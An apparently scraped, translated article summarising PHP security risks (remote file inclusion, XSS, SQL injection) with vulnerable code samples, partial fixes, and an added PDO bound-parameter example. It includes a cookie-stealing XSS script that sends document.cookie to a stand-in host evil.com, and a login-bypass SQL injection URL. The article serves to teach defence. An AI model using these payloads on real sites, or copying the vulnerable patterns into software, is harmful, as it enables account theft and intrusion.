A summary of some hidden security risks in PHP code

Source: Internet
Author: User

I searched Baidu a bit. After open_basedir is set, only PHP scripts in the specified directories and their subdirectories will be executed.
Using PHP to read a directory or file outside open_basedir fails with an "insufficient permissions" error.
Virtual hosting vendors generally set it to /tmp and /home.

That is the usual practice, but we still have to find ways to solve these problems ourselves. The following summarizes some PHP security issues.

1. With include, be careful to check that the file actually exists locally, so as not to create a security vulnerability.
For example:

The code is as follows:
<?php
// $module comes straight from the request (vulnerable)
include $module . '.php';
?>


This assumes that $module is a global variable.
This script gives an attacker the opportunity to execute any PHP code on your server, for example by appending module=http://example.com/my to the URL in the browser. When PHP receives this URL, the value of the "$module" variable in the script is set to http://example.com/my. So it's dangerous when PHP executes the include ...
Workaround: turn off register_globals in php.ini, or check the value before the include.

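The code is as follows:
<?php
// Only include the file if it exists locally.
// Note: this only confirms the file exists; it does not restrict which local file is chosen.
if (file_exists($module . '.php')) {
    include $module . '.php';
}
?>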


2. Cross-site scripting (XSS)
Simply put, attackers can execute client-side scripts, such as JS, in the user's browser, and then steal cookies or other important data from users.
For example: <script language='JavaScript'>document.location='http://evil.com/cgi-bin/cookie.cgi?f='+document.cookie</script>
If you click the button, your local cookie information will be sent to someone else's mailbox (this shows how easily a website can be made to steal user information).

3. SQL injection
Personally, I feel that SQL's own flexibility and ease of use are what bring about its negative side.

The code is as follows:
<?php
// $user and $pw come straight from the request (vulnerable)
$query = "SELECT login_id FROM users WHERE user='$user' AND pwd='$pw'";
mysql_query($query); // the mysql_* functions were removed in PHP 7.0
?>

For example, someone requests
http://example.com/login.php?user=admin'%20or%20(user='&pwd=')%20or%20user='
Your PHP code may then become:

The code is as follows:
<?php
// The query text after the request values are substituted in
$query = "SELECT login_id FROM users WHERE user='admin' or (user='' and pwd='') or user=''";
mysql_query($query);
?>


You can filter the input with a function, filtering out ('), ("), (), etc.
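
The following is an added example, not code from the original page: it runs the page's login query both with string concatenation and with bound parameters, which keep the request values out of the SQL text without relying on character filtering. It assumes PHP 7.1+ with the pdo_sqlite extension; the in-memory table, the password value and the function names login_concat and login_bound are constructed for illustration.

```php
<?php
// Added example. Constructed sample data: an in-memory table shaped like the page's query.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (login_id INTEGER PRIMARY KEY, user TEXT, pwd TEXT)');
// pwd is compared directly only to mirror the page's query;
// real code stores password_hash() output and checks it with password_verify().
$db->prepare('INSERT INTO users (user, pwd) VALUES (?, ?)')
   ->execute(['admin', 's3cret-constructed']);

// "Before": the page's pattern, request values concatenated into the SQL text.
function login_concat(PDO $db, string $user, string $pw): ?int
{
    $query = "SELECT login_id FROM users WHERE user='$user' AND pwd='$pw'";
    $row = $db->query($query)->fetch(PDO::FETCH_ASSOC);
    return $row ? (int) $row['login_id'] : null;
}

// "After": the SQL text is fixed; the values travel separately as bound parameters,
// so quotes and parentheses in them are data, never SQL syntax.
function login_bound(PDO $db, string $user, string $pw): ?int
{
    $stmt = $db->prepare('SELECT login_id FROM users WHERE user = :user AND pwd = :pw');
    $stmt->execute([':user' => $user, ':pw' => $pw]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? (int) $row['login_id'] : null;
}

// The two request values from the page's URL, URL-decoded.
$user = "admin' or (user='";
$pw   = "') or user='";

foreach (['login_concat', 'login_bound'] as $fn) {
    $id = $fn($db, $user, $pw);
    printf("%-12s page input -> %s\n", $fn, $id === null ? 'rejected' : "logged in as login_id $id");
    $id = $fn($db, 'admin', 's3cret-constructed');
    printf("%-12s real login -> %s\n", $fn, $id === null ? 'rejected' : "logged in as login_id $id");
}
```

With the page's input, login_concat returns the admin row while login_bound rejects it; both accept the real credentials.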
